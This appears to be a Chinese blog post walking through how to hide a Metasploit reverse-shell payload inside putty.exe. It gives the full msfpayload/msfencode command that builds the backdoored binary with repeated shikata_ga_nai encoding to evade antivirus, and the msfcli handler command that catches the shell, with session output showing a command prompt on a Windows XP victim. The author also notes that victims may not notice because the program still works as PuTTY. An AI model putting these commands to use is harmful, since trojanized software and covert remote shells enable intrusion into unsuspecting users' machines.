metasploit隐秘地启动一个攻击载荷

在网上下载putty.exe,上传到bt5,然后复制到/opt/metasploit/msf3/work目录

root@bt:/opt/metasploit/msf3# time msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 R | msfencode -t exe -x work/putty.exe -o putty_backdoor.exe -e x86/shikata_ga_nai -k -c 5
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)


real    0m42.531s
user    0m25.086s
sys     0m16.381s
root@bt:/opt/metasploit/msf3# 

上传到XP,还是报威胁。

metasploit隐秘地启动一个攻击载荷_第1张图片


我关掉杀毒软件,然后双击putty_backdoor.exe,看看:


metasploit隐秘地启动一个攻击载荷_第2张图片

弹出这个,但是很快就没了,出现了一两秒的样子。

这时,当我在BT5运行msfcli时,它就一直显示,不会一闪而过:

root@bt:~# msfcli exploit/multi/handler PAYLOAD=windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 E
[*] Please wait while we load the module tree...

                          ########                  #
                      #################            #
                   ######################         #
                  #########################      #
                ############################
               ##############################
               ###############################
              ###############################
              ##############################
                              #    ########   #
                 ##        ###        ####   ##
                                      ###   ###
                                    ####   ###
               ####          ##########   ####
               #######################   ####
                 ####################   ####
                  ##################  ####
                    ############      ##
                       ########        ###
                      #########        #####
                    ############      ######
                   ########      #########
                     #####       ########
                       ###       #########
                      ######    ############
                     #######################
                     #   #   ###  #   #   ##
                     ########################
                      ##     ##   ##     ##



       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops

PAYLOAD => windows/shell_reverse_tcp
LHOST => 192.168.1.11
LPORT => 31337
[*] Started reverse handler on 192.168.1.11:31337 
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.1.11:31337 -> 192.168.1.142:1136) at 2013-04-28 06:13:58 -0400

Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

C:\1>

运行msfcli后,出现

[*] Starting the payload handler...

时,就双击putty_backdoor.exe,这时,那上面的图片所显示的登录的界面,就一直停留着了,不会像刚才那样,一闪而过了。

而且,它也有putty.exe的功能,能正常登录,如下图:


metasploit隐秘地启动一个攻击载荷_第3张图片


但是,当我在bt5退出时:

C:\1>exit
exit

[*] Command shell session 1 closed.  Reason: Died from Errno::ECONNRESET

root@bt:~# 

XP上的登录界面(如上图所示)也没有了。


这时,不明真相的人,可能并不会在意。不过,如果多试几次,可能会看出点问题来。


现在的问题是,这个exe惊动了杀毒软件,没有躲过杀毒软件。


你可能感兴趣的:(metasploit隐秘地启动一个攻击载荷)